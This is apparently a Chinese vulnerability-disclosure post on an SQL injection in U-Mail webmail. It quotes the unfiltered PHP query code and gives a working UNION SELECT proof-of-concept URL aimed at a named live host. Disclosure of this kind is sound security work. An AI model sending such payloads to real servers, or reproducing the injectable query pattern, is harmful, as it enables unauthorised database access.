U-Mail邮件服务系统最新版SQL注入漏洞

  • A+
所属分类:漏洞时代
摘要

漏洞文件:client/option/module/views.php
[php]
if ( ACTION == “letterpaper” ) { $lp_id = gss( $_GET[‘id’] );

漏洞文件:client/option/module/views.php
[php]
if ( ACTION == "letterpaper" )

{

$lp_id = gss( $_GET['id'] );

if ( $lp_id )

{

if ( $lp_id == "add" )

{

$lp_info['letterpaper'] = "

";

}

else

{

$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );

}

}

else

{

$lp_list = $Widget->get_letterpaper( array(

"fields" => "*",

"where" => "UserID=0 or UserID=".$user_id,

"orderby" => "UserID",

"debug" => 0

) );

}

include( load_tpl( "op_letterpaper" ) );

}

[/php]
未过滤直接进入查询
[php]
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
[/php]
http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8

U-Mail邮件服务系统最新版SQL注入漏洞

U-Mail邮件服务系统最新版SQL注入漏洞
[php]

背景图片:

U-Mail邮件服务系统最新版SQL注入漏洞
[/php]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: